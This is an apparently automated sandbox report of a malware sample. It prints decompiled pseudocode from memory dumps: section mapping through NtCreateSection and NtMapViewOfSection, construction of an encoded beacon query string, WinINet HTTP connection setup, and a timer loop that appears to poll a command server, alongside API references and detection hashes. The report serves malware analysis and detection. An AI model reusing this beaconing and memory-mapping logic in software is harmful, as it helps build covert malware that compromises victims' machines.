Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: ErrorFileLast$Time$CloseCreateHandleMappingSystemView
String ID:
API String ID: 3812556954-0
Opcode ID: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
Instruction ID: e8584db34bd0864965919452e9e7a980232bfbaa31af8ac4f809374209f4ae08
Opcode Fuzzy Hash: 7752c77afcbcd24e49e1d06c42e18f922df8dbfab1a36fcb7e960a63200854d4
Instruction Fuzzy Hash: 1421C8B2500208BFD7119FA4DC84EAF3BACEB44355F14443AFA05F72E0D6758D458B68

Uniqueness

Uniqueness Score: -1.00%

Function 0040110B Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70
nativeCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E0040110B(intOrPtr* __eax, void** _a4) {
				int _v12;
				void* _v16;
				void* _v20;
				void* _v24;
				int _v28;
				int _v32;
				intOrPtr _v36;
				int _v40;
				int _v44;
				void* _v48;
				void* __esi;
				long _t34;
				void* _t39;
				void* _t47;
				intOrPtr* _t48;

				_t48 = __eax;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				_v24 =  *((intOrPtr*)(__eax + 4));
				_v16 = 0;
				_v12 = 0;
				_v48 = 0x18;
				_v44 = 0;
				_v36 = 0x40;
				_v40 = 0;
				_v32 = 0;
				_v28 = 0;
				_t34 = NtCreateSection( &_v16, 0xf001f,  &_v48,  &_v24,  *(__eax + 8), 0x8000000, 0);
				if(_t34 < 0) {
					_t47 =  *((intOrPtr*)(_t48 + 0x18))(_t34);
				} else {
					 *_t48 = _v16;
					_t39 = E00401459(_t48,  &_v12); // executed
					_t47 = _t39;
					if(_t47 != 0) {
						 *((intOrPtr*)(_t48 + 0x1c))(_v16);
					} else {
						memset(_v12, 0, _v24);
						 *_a4 = _v12;
					}
				}
				return _t47;
			}

0x00401114
0x0040111b
0x0040111c
0x0040111d
0x0040111e
0x0040111f
0x00401130
0x00401134
0x00401148
0x0040114b
0x0040114e
0x00401155
0x00401158
0x0040115f
0x00401162
0x00401165
0x00401168
0x0040116d
0x004011a8
0x0040116f
0x00401172
0x00401178
0x0040117d
0x00401181
0x0040119f
0x00401183
0x0040118a
0x00401198
0x00401198
0x00401181
0x004011b0

APIs

NtCreateSection.NTDLL(?,000F001F,?,?,?,08000000,00000000,74714EE0,00000000,00000000,?), ref: 00401168

Part of subcall function 00401459: NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486

memset.NTDLL ref: 0040118A

Strings

@, xrefs: 00401158

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: Section$CreateViewmemset
String ID: @
API String ID: 2533685722-2766056989
Opcode ID: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
Instruction ID: 902b655066e6f1ef2c1749b59dddf7677aeeae3e3ffa194d207bc0e2506ab0da
Opcode Fuzzy Hash: 232f3a30dcae69e5963f78d425f34a7bb228badb3687228d0737aca19cbd4a2f
Instruction Fuzzy Hash: 38214DB1D00209AFDB10DFA9C8809EEFBB9FF48314F10453AE616F7250D734AA048B64

Uniqueness

Uniqueness Score: -1.00%

Function 00401459 Relevance: 1.5, APIs: 1, Instructions: 34
nativeCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00401459(void** __esi, PVOID* _a4) {
				long _v8;
				void* _v12;
				void* _v16;
				long _t13;

				_v16 = 0;
				asm("stosd");
				_v8 = 0;
				_t13 = NtMapViewOfSection( *__esi, 0xffffffff, _a4, 0, 0,  &_v16,  &_v8, 2, 0, __esi[2]);
				if(_t13 < 0) {
					_push(_t13);
					return __esi[6]();
				}
				return 0;
			}

0x0040146b
0x00401471
0x0040147f
0x00401486
0x0040148b
0x00401491
0x00000000
0x00401492
0x00000000

APIs

NtMapViewOfSection.NTDLL(00000000,000000FF,?,00000000,00000000,?,0040117D,00000002,00000000,?,?,00000000,?,?,0040117D,00000002), ref: 00401486

Memory Dump Source

Source File: 00000000.00000002.568999225.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.568999225.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.568999225.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_server.jbxd

Similarity

API ID: SectionView
String ID:
API String ID: 1323581903-0
Opcode ID: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction ID: 2ffffb3a0e1fef12aabb3d262299a14fd526f72662b70b4f27343324966f1358
Opcode Fuzzy Hash: 5dd26fff624a50198c0bd826f45a2e4ef6e885f587514f0e64cb0fed618db76f
Instruction Fuzzy Hash: E9F037B590020CFFDB11DFA5CC85CAFBBBDEB44354B10493AF552E50A0D6309E089B60

Uniqueness

Uniqueness Score: -1.00%

Function 02BD3CE0 Relevance: 45.7, APIs: 25, Strings: 1, Instructions: 222
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 69%

			E02BD3CE0(long __eax, void* __ecx, void* __edx, void* _a12, intOrPtr _a20) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				void* _v48;
				intOrPtr _v56;
				void* __edi;
				intOrPtr _t30;
				void* _t31;
				intOrPtr _t33;
				intOrPtr _t34;
				intOrPtr _t35;
				intOrPtr _t36;
				intOrPtr _t37;
				void* _t40;
				intOrPtr _t41;
				int _t44;
				intOrPtr _t45;
				int _t48;
				void* _t49;
				intOrPtr _t53;
				intOrPtr _t59;
				intOrPtr _t63;
				intOrPtr* _t65;
				void* _t66;
				intOrPtr _t71;
				intOrPtr _t77;
				intOrPtr _t80;
				intOrPtr _t83;
				int _t86;
				intOrPtr _t88;
				int _t91;
				intOrPtr _t93;
				int _t96;
				void* _t98;
				void* _t99;
				void* _t103;
				void* _t105;
				void* _t106;
				intOrPtr _t107;
				long _t109;
				intOrPtr* _t110;
				intOrPtr* _t111;
				long _t112;
				int _t113;
				void* _t114;
				void* _t115;
				void* _t116;
				void* _t119;
				void* _t120;
				void* _t122;
				void* _t123;

				_t103 = __edx;
				_t99 = __ecx;
				_t120 =  &_v16;
				_t112 = __eax;
				_t30 =  *0x2bda3e0; // 0x35b9c48
				_v4 = _t30;
				_v8 = 8;
				_t31 = RtlAllocateHeap( *0x2bda2d8, 0, 0x800); // executed
				_t98 = _t31;
				if(_t98 != 0) {
					if(_t112 == 0) {
						_t112 = GetTickCount();
					}
					_t33 =  *0x2bda018; // 0x3dd6b064
					asm("bswap eax");
					_t34 =  *0x2bda014; // 0x3a87c8cd
					asm("bswap eax");
					_t35 =  *0x2bda010; // 0xd8d2f808
					asm("bswap eax");
					_t36 =  *0x2bda00c; // 0x81762942
					asm("bswap eax");
					_t37 =  *0x2bda348; // 0x9dd5a8
					_t3 = _t37 + 0x2bdb5ac; // 0x74666f73
					_t113 = wsprintfA(_t98, _t3, 2, 0x3d18f, _t36, _t35, _t34, _t33,  *0x2bda02c,  *0x2bda004, _t112);
					_t40 = E02BD467F();
					_t41 =  *0x2bda348; // 0x9dd5a8
					_t4 = _t41 + 0x2bdb575; // 0x74707526
					_t44 = wsprintfA(_t113 + _t98, _t4, _t40);
					_t122 = _t120 + 0x38;
					_t114 = _t113 + _t44;
					if(_a12 != 0) {
						_t93 =  *0x2bda348; // 0x9dd5a8
						_t8 = _t93 + 0x2bdb508; // 0x732526
						_t96 = wsprintfA(_t114 + _t98, _t8, _a12);
						_t122 = _t122 + 0xc;
						_t114 = _t114 + _t96;
					}
					_t45 =  *0x2bda348; // 0x9dd5a8
					_t10 = _t45 + 0x2bdb246; // 0x74636126
					_t48 = wsprintfA(_t114 + _t98, _t10, 0);
					_t123 = _t122 + 0xc;
					_t115 = _t114 + _t48; // executed
					_t49 = E02BD472F(_t99); // executed
					_t105 = _t49;
					if(_t105 != 0) {
						_t88 =  *0x2bda348; // 0x9dd5a8
						_t12 = _t88 + 0x2bdb8d0; // 0x736e6426
						_t91 = wsprintfA(_t115 + _t98, _t12, _t105);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t91;
						HeapFree( *0x2bda2d8, 0, _t105);
					}
					_t106 = E02BD1340();
					if(_t106 != 0) {
						_t83 =  *0x2bda348; // 0x9dd5a8
						_t14 = _t83 + 0x2bdb8c5; // 0x6f687726
						_t86 = wsprintfA(_t115 + _t98, _t14, _t106);
						_t123 = _t123 + 0xc;
						_t115 = _t115 + _t86;
						HeapFree( *0x2bda2d8, 0, _t106);
					}
					_t107 =  *0x2bda3cc; // 0x35b9600
					_a20 = E02BD6B59(0x2bda00a, _t107 + 4);
					_t53 =  *0x2bda36c; // 0x35b95b0
					_t109 = 0;
					if(_t53 != 0) {
						_t80 =  *0x2bda348; // 0x9dd5a8
						_t17 = _t80 + 0x2bdb8be; // 0x3d736f26
						wsprintfA(_t115 + _t98, _t17, _t53);
					}
					if(_a20 != _t109) {
						_t116 = RtlAllocateHeap( *0x2bda2d8, _t109, 0x800);
						if(_t116 != _t109) {
							E02BD2915(GetTickCount());
							_t59 =  *0x2bda3cc; // 0x35b9600
							__imp__(_t59 + 0x40);
							asm("lock xadd [eax], ecx");
							_t63 =  *0x2bda3cc; // 0x35b9600
							__imp__(_t63 + 0x40);
							_t65 =  *0x2bda3cc; // 0x35b9600
							_t66 = E02BD6675(1, _t103, _t98,  *_t65); // executed
							_t119 = _t66;
							asm("lock xadd [eax], ecx");
							if(_t119 != _t109) {
								StrTrimA(_t119, 0x2bd9280);
								_push(_t119);
								_t71 = E02BD7563();
								_v20 = _t71;
								if(_t71 != _t109) {
									_t110 = __imp__;
									 *_t110(_t119, _v8);
									 *_t110(_t116, _v8);
									_t111 = __imp__;
									 *_t111(_t116, _v32);
									 *_t111(_t116, _t119);
									_t77 = E02BD21A6(0xffffffffffffffff, _t116, _v28, _v24); // executed
									_v56 = _t77;
									if(_t77 != 0 && _t77 != 0x10d2) {
										E02BD63F6();
									}
									HeapFree( *0x2bda2d8, 0, _v48);
									_t109 = 0;
								}
								HeapFree( *0x2bda2d8, _t109, _t119);
							}
							RtlFreeHeap( *0x2bda2d8, _t109, _t116); // executed
						}
						HeapFree( *0x2bda2d8, _t109, _a12);
					}
					RtlFreeHeap( *0x2bda2d8, _t109, _t98); // executed
				}
				return _v16;
			}

0x02bd3ce0
0x02bd3ce0
0x02bd3ce0
0x02bd3cf5
0x02bd3cf7
0x02bd3cfc
0x02bd3d00
0x02bd3d08
0x02bd3d0e
0x02bd3d12
0x02bd3d1a
0x02bd3d22
0x02bd3d22
0x02bd3d24
0x02bd3d30
0x02bd3d3f
0x02bd3d44
0x02bd3d47
0x02bd3d4c
0x02bd3d4f
0x02bd3d54
0x02bd3d57
0x02bd3d63
0x02bd3d70
0x02bd3d72
0x02bd3d78
0x02bd3d7d
0x02bd3d88
0x02bd3d8a
0x02bd3d8d
0x02bd3d93
0x02bd3d95
0x02bd3d9e
0x02bd3da9
0x02bd3dab
0x02bd3dae
0x02bd3dae
0x02bd3db0
0x02bd3db5
0x02bd3dc1
0x02bd3dc3
0x02bd3dc6
0x02bd3dc8
0x02bd3dcd
0x02bd3dd1
0x02bd3dd3
0x02bd3dd8
0x02bd3de4
0x02bd3de6
0x02bd3df2
0x02bd3df4
0x02bd3df4
0x02bd3dff
0x02bd3e03
0x02bd3e05
0x02bd3e0a
0x02bd3e16
0x02bd3e18
0x02bd3e24
0x02bd3e26
0x02bd3e26
0x02bd3e2c
0x02bd3e3f
0x02bd3e43
0x02bd3e48
0x02bd3e4c
0x02bd3e4f
0x02bd3e54
0x02bd3e5e
0x02bd3e60
0x02bd3e67
0x02bd3e7f
0x02bd3e83
0x02bd3e8f
0x02bd3e94
0x02bd3e9d
0x02bd3eae
0x02bd3eb2
0x02bd3ebb
0x02bd3ec1
0x02bd3ec9
0x02bd3ece
0x02bd3edb
0x02bd3ee1
0x02bd3eed
0x02bd3ef3
0x02bd3ef4
0x02bd3ef9
0x02bd3eff
0x02bd3f05
0x02bd3f0c
0x02bd3f13
0x02bd3f19
0x02bd3f20
0x02bd3f24
0x02bd3f2f
0x02bd3f34
0x02bd3f3a
0x02bd3f43
0x02bd3f43
0x02bd3f54
0x02bd3f5a
0x02bd3f5a
0x02bd3f64
0x02bd3f64
0x02bd3f72
0x02bd3f72
0x02bd3f83
0x02bd3f83
0x02bd3f91
0x02bd3f91
0x02bd3fa2

APIs

RtlAllocateHeap.NTDLL ref: 02BD3D08
GetTickCount.KERNEL32 ref: 02BD3D1C
wsprintfA.USER32 ref: 02BD3D6B
wsprintfA.USER32 ref: 02BD3D88
wsprintfA.USER32 ref: 02BD3DA9
wsprintfA.USER32 ref: 02BD3DC1
wsprintfA.USER32 ref: 02BD3DE4
HeapFree.KERNEL32(00000000,00000000), ref: 02BD3DF4
wsprintfA.USER32 ref: 02BD3E16
HeapFree.KERNEL32(00000000,00000000), ref: 02BD3E26
wsprintfA.USER32 ref: 02BD3E5E
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 02BD3E79
GetTickCount.KERNEL32 ref: 02BD3E89
RtlEnterCriticalSection.NTDLL(035B95C0), ref: 02BD3E9D
RtlLeaveCriticalSection.NTDLL(035B95C0), ref: 02BD3EBB

Part of subcall function 02BD6675: lstrlen.KERNEL32(00000000,00000000,253D7325,00000000,00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A0
Part of subcall function 02BD6675: lstrlen.KERNEL32(00000000,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66A8
Part of subcall function 02BD6675: strcpy.NTDLL ref: 02BD66BF
Part of subcall function 02BD6675: lstrcat.KERNEL32(00000000,00000000), ref: 02BD66CA
Part of subcall function 02BD6675: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,02BD3ECE,?,775EC740,02BD3ECE,00000000,035B9600), ref: 02BD66E7

StrTrimA.SHLWAPI(00000000,02BD9280,00000000,035B9600), ref: 02BD3EED

Part of subcall function 02BD7563: lstrlen.KERNEL32(035B9C38,00000000,00000000,00000000,02BD3EF9,00000000), ref: 02BD7573
Part of subcall function 02BD7563: lstrlen.KERNEL32(?), ref: 02BD757B
Part of subcall function 02BD7563: lstrcpy.KERNEL32(00000000,035B9C38), ref: 02BD758F
Part of subcall function 02BD7563: lstrcat.KERNEL32(00000000,?), ref: 02BD759A

lstrcpy.KERNEL32(00000000,?), ref: 02BD3F0C
lstrcpy.KERNEL32(00000000,?), ref: 02BD3F13
lstrcat.KERNEL32(00000000,?), ref: 02BD3F20
lstrcat.KERNEL32(00000000,00000000), ref: 02BD3F24

Part of subcall function 02BD21A6: WaitForSingleObject.KERNEL32(00000000,747581D0,00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 02BD2258

HeapFree.KERNEL32(00000000,?,00000000,?,?), ref: 02BD3F54
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 02BD3F64
RtlFreeHeap.NTDLL(00000000,00000000,00000000,035B9600), ref: 02BD3F72
HeapFree.KERNEL32(00000000,?), ref: 02BD3F83
RtlFreeHeap.NTDLL(00000000,00000000), ref: 02BD3F91

Strings

Uqt, xrefs: 02BD3DF4, 02BD3E26, 02BD3F54, 02BD3F64, 02BD3F72, 02BD3F83, 02BD3F91

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Heap$Freewsprintf$lstrcatlstrlen$lstrcpy$AllocateCountCriticalSectionTickTrim$EnterLeaveObjectSingleWaitstrcpy
String ID: Uqt
API String ID: 186568778-2320327147
Opcode ID: 9caf7c2dec365afb019fc24e57fcfa974ba71ccad5196be0dd828220a358236a
Instruction ID: 6618f52536c9fdf171490afb6bb91d4056f1267d490413274b1583e9d858df8d
Opcode Fuzzy Hash: 9caf7c2dec365afb019fc24e57fcfa974ba71ccad5196be0dd828220a358236a
Instruction Fuzzy Hash: BC712331842204AFC711AB68EC58EDB3BFDEB88794B060964F949D3211F732E924DF61

Uniqueness

Uniqueness Score: -1.00%

Function 02BD7B83 Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 126
networkstringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E02BD7B83(void* __eax, void* __ecx, long __esi, char* _a4) {
				void _v8;
				long _v12;
				void _v16;
				void* _t34;
				void* _t38;
				void* _t40;
				char* _t56;
				long _t57;
				void* _t58;
				intOrPtr _t59;
				long _t65;

				_t65 = __esi;
				_t58 = __ecx;
				_v16 = 0xea60;
				__imp__( *(__esi + 4));
				_v12 = __eax + __eax;
				_t56 = E02BD33DC(__eax + __eax + 1);
				if(_t56 != 0) {
					if(InternetCanonicalizeUrlA( *(__esi + 4), _t56,  &_v12, 0) == 0) {
						E02BD61DA(_t56);
					} else {
						E02BD61DA( *(__esi + 4));
						 *(__esi + 4) = _t56;
					}
				}
				_t34 = InternetOpenA(_a4, 0, 0, 0, 0x10000000); // executed
				 *(_t65 + 0x10) = _t34;
				if(_t34 == 0 || InternetSetStatusCallback(_t34, E02BD7B18) == 0xffffffff) {
					L15:
					return GetLastError();
				} else {
					ResetEvent( *(_t65 + 0x1c));
					_t38 = InternetConnectA( *(_t65 + 0x10),  *_t65, 0x50, 0, 0, 3, 0, _t65); // executed
					 *(_t65 + 0x14) = _t38;
					if(_t38 != 0 || GetLastError() == 0x3e5 && E02BD16B2( *(_t65 + 0x1c), _t58, 0xea60) == 0) {
						_t59 =  *0x2bda348; // 0x9dd5a8
						_t15 = _t59 + 0x2bdb845; // 0x544547
						_v8 = 0x84404000;
						_t40 = HttpOpenRequestA( *(_t65 + 0x14), _t15,  *(_t65 + 4), 0, 0, 0, 0x84404000, _t65); // executed
						 *(_t65 + 0x18) = _t40;
						if(_t40 == 0) {
							goto L15;
						}
						_t57 = 4;
						_v12 = _t57;
						if(InternetQueryOptionA(_t40, 0x1f,  &_v8,  &_v12) != 0) {
							_v8 = _v8 | 0x00000100;
							InternetSetOptionA( *(_t65 + 0x18), 0x1f,  &_v8, _t57);
						}
						if(InternetSetOptionA( *(_t65 + 0x18), 6,  &_v16, _t57) == 0 || InternetSetOptionA( *(_t65 + 0x18), 5,  &_v16, _t57) == 0) {
							goto L15;
						} else {
							return 0;
						}
					} else {
						goto L15;
					}
				}
			}

0x02bd7b83
0x02bd7b83
0x02bd7b8e
0x02bd7b95
0x02bd7b9d
0x02bd7ba7
0x02bd7bad
0x02bd7bc0
0x02bd7bd0
0x02bd7bc2
0x02bd7bc5
0x02bd7bca
0x02bd7bca
0x02bd7bc0
0x02bd7be0
0x02bd7be6
0x02bd7beb
0x02bd7cd4
0x00000000
0x02bd7c06
0x02bd7c09
0x02bd7c1c
0x02bd7c22
0x02bd7c27
0x02bd7c4f
0x02bd7c62
0x02bd7c6c
0x02bd7c6f
0x02bd7c75
0x02bd7c7a
0x00000000
0x00000000
0x02bd7c7e
0x02bd7c8a
0x02bd7c9b
0x02bd7c9d
0x02bd7cae
0x02bd7cae
0x02bd7cbe
0x00000000
0x02bd7cd0
0x00000000
0x02bd7cd0
0x00000000
0x00000000
0x00000000
0x02bd7c27

APIs

lstrlen.KERNEL32(?,00000008,74714D40), ref: 02BD7B95

Part of subcall function 02BD33DC: RtlAllocateHeap.NTDLL(00000000,00000000,02BD62F6), ref: 02BD33E8

InternetCanonicalizeUrlA.WININET(?,00000000,00000000,00000000), ref: 02BD7BB8
InternetOpenA.WININET(00000000,00000000,00000000,00000000,10000000), ref: 02BD7BE0
InternetSetStatusCallback.WININET(00000000,02BD7B18), ref: 02BD7BF7
ResetEvent.KERNEL32(?), ref: 02BD7C09
InternetConnectA.WININET(?,?,00000050,00000000,00000000,00000003,00000000,?), ref: 02BD7C1C
GetLastError.KERNEL32 ref: 02BD7C29
HttpOpenRequestA.WININET(?,00544547,?,00000000,00000000,00000000,84404000,?), ref: 02BD7C6F
InternetQueryOptionA.WININET(00000000,0000001F,00000000,00000000), ref: 02BD7C8D
InternetSetOptionA.WININET(?,0000001F,00000100,00000004), ref: 02BD7CAE
InternetSetOptionA.WININET(?,00000006,0000EA60,00000004), ref: 02BD7CBA
InternetSetOptionA.WININET(?,00000005,0000EA60,00000004), ref: 02BD7CCA
GetLastError.KERNEL32 ref: 02BD7CD4

Part of subcall function 02BD61DA: RtlFreeHeap.NTDLL(00000000,00000000,02BD6383,00000000,?,00000000,00000000), ref: 02BD61E6

Strings

@MqtNqt, xrefs: 02BD7C29, 02BD7CD4

Memory Dump Source

Source File: 00000000.00000002.569425098.0000000002BD1000.00000020.10000000.00040000.00000000.sdmp, Offset: 02BD0000, based on PE: true

Associated: 00000000.00000002.569419789.0000000002BD0000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569434276.0000000002BD9000.00000002.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569439760.0000000002BDA000.00000004.10000000.00040000.00000000.sdmpDownload File
Associated: 00000000.00000002.569445947.0000000002BDC000.00000002.10000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_2bd0000_server.jbxd

Similarity

API ID: Internet$Option$ErrorHeapLastOpen$AllocateCallbackCanonicalizeConnectEventFreeHttpQueryRequestResetStatuslstrlen
String ID: @MqtNqt
API String ID: 2290446683-2883916605
Opcode ID: 6fe75e801c0a638f80a9d4615fd03db345e41f138a9fe0acea31102ece9aee8e
Instruction ID: 8b9a6ca72c0855b079156797f83c2aefb77b9a52efc1329e2130ad4315224d6c
Opcode Fuzzy Hash: 6fe75e801c0a638f80a9d4615fd03db345e41f138a9fe0acea31102ece9aee8e
Instruction Fuzzy Hash: 4C41AC71900604BFEB319FA5DC48EDBBBBDEB85744B144DA8F606E2090FB70A654DB20

Uniqueness

Uniqueness Score: -1.00%

Function 02BD6815 Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 151
timememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 83%

			E02BD6815(void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void _v48;
				long _v52;
				struct %anon52 _v60;
				char _v72;
				long _v76;
				void* _v80;
				union _LARGE_INTEGER _v84;
				struct %anon52 _v92;
				void* _v96;
				void* _v100;
				union _LARGE_INTEGER _v104;
				long _v108;
				struct %anon52 _v124;
				long _v128;
				struct %anon52 _t46;
				void* _t51;
				long _t53;
				void* _t54;
				struct %anon52 _t61;
				long _t65;
				struct %anon52 _t66;
				void* _t69;
				void* _t73;
				signed int _t74;
				void* _t76;
				void* _t78;
				void** _t82;
				signed int _t86;
				void* _t89;

				_t76 = __edx;
				_v52 = 0;
				memset( &_v48, 0, 0x2c);
				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
				_t46 = CreateWaitableTimerA(0, 1, 0);
				_v60 = _t46;
				if(_t46 == 0) {
					_v92.HighPart = GetLastError();
				} else {
					_push(0xffffffff);
					_push(0xff676980);
					_push(0);
					_push( *0x2bda2e0);
					_v76 = 0;
					_v80 = 0;
					L02BD82DA();
					_v84.LowPart = _t46;
					_v80 = _t76;
					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
					_t51 =  *0x2bda30c; // 0x308
					_v76 = _t51;
					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
					_v108 = _t53;
					if(_t53 == 0) {
						if(_a8 != 0) {
							L4:
							 *0x2bda2ec = 5;
						} else {
							_t69 = E02BD5251(_t76); // executed
							if(_t69 != 0) {
								goto L4;
							}
						}
						_v104.LowPart = 0;
						L6:
						L6:
						if(_v104.LowPart == 1 && ( *0x2bda300 & 0x00000001) == 0) {
							_v104.LowPart = 2;
						}
						_t74 = _v104.LowPart;
						_t58 = _t74 << 4;
						_t78 = _t89 + (_t74 << 4) + 0x38;
						_t75 = _t74 + 1;
						_v92.LowPart = _t74 + 1;
						_t61 = E02BD35D2( &_v96, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
						_v124 = _t61;
						if(_t61 != 0) {
							goto L17;
						}
						_t66 = _v92;
						_v104.LowPart = _t66;
						if(_t66 != 3) {
							goto L6;
						} else {
							_v124.HighPart = E02BD69E6(_t75,  &_v72, _a4, _a8);
						}
						goto L12;
						L17:
						__eflags = _t61 - 0x10d2;
						if(_t61 != 0x10d2) {
							_push(0xffffffff);
							_push(0xff676980);
							_push(0);
							_push( *0x2bda2e4);
							goto L21;
						} else {
							__eflags =  *0x2bda2e8; // 0x0
							if(__eflags == 0) {
								goto L12;
							} else {
								_t61 = E02BD63F6();
								_push(0xffffffff);
								_push(0xdc3cba00);
								_push(0);
								_push( *0x2bda2e8);
								L21:
								L02BD82DA();
								_v104.LowPart = _t61;
								_v100 = _t78;
								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
								_v128 = _t65;
								__eflags = _t65;
								if(_t65 == 0) {
									goto L6;
								} else {
									goto L12;
								}
							}
						}
						L25:
					}
					L12:
					_t82 =  &_v72;
					_t73 = 3;
					do {
						_t54 =  *_t82;
						if(_t54 != 0) {
							HeapFree( *0x2bda2d8, 0, _t54);
						}
						_t82 =  &(_t82[4]);
						_t73 = _t73 - 1;
					} while (_t73 != 0);
					CloseHandle(_v80);
				}
				return _v92.HighPart;
				goto L25;
			}

0x02bd6815
0x02bd682b
0x02bd682f
0x02bd6834
0x02bd683b
0x02bd6841
0x02bd6847
0x02bd69ce
0x02bd684d
0x02bd684d
0x02bd684f
0x02bd6854
0x02bd6855
0x02bd685b
0x02bd685f
0x02bd6863
0x02bd6871
0x02bd687f
0x02bd6883
0x02bd6885
0x02bd6892
0x02bd689e
0x02bd68a0
0x02bd68a6
0x02bd68af
0x02bd68ba
0x02bd68ba
0x02bd68b1
0x02bd68b1
0x02bd68b8
0x00000000
0x00000000
0x02bd68b8
0x02bd68c4
0x00000000
0x02bd68c8
0x02bd68cd
0x02bd68d8
0x02bd68d8
0x02bd68e0
0x02bd68e6
0x02bd68ee
0x02bd68f7
0x02bd68fe
0x02bd6902
0x02bd6907
0x02bd690d
0x00000000
0x00000000
0x02bd690f
0x02bd6913
0x02bd691a
0x00000000
0x02bd691c
0x02bd692c
0x02bd692c
0x00000000
0x02bd695d
0x02bd695d
0x02bd6962
0x02bd6981
0x02bd6983
0x02bd6988
0x02bd6989
0x00000000
0x02bd6964
0x02bd6964
0x02bd696a
0x00000000
0x02bd696c
0x02bd696c
0x02bd6971
0x02bd6973
0x02bd6978
0x02bd6979
0x02bd698f
0x02bd698f
0x02bd6997
0x02bd69a5
0x02bd69a9
0x02bd69b5
0x02bd69b7
0x02bd69bb
0x02bd69bd
0x00000000
0x02bd69c3
0x00000000
0x02bd69c3
0x02bd69bd
0x02bd696a
0x00000000
0x02bd6962
0x02bd6930
0x02bd6932
0x02bd6936
0x02bd6937
0x02bd6937
0x02bd693b
0x02bd6945
0x02bd6945
0x02bd694b
0x02bd694e
0x02bd694e
0x02bd6955
0x02bd6955
0x02bd69dc
0x00000000

APIs

memset.NTDLL ref: 02BD682F
CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 02BD683B
_allmul.NTDLL(00000000,FF676980,000000FF), ref: 02BD6863
SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 02BD6883
WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,02BD26E9,?), ref: 02BD689E
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?,?,?,02BD26E9,?,00000000), ref: 02BD6945
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,02BD26E9,?,00000000,?,?), ref: 02BD6955
_allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 02BD698F
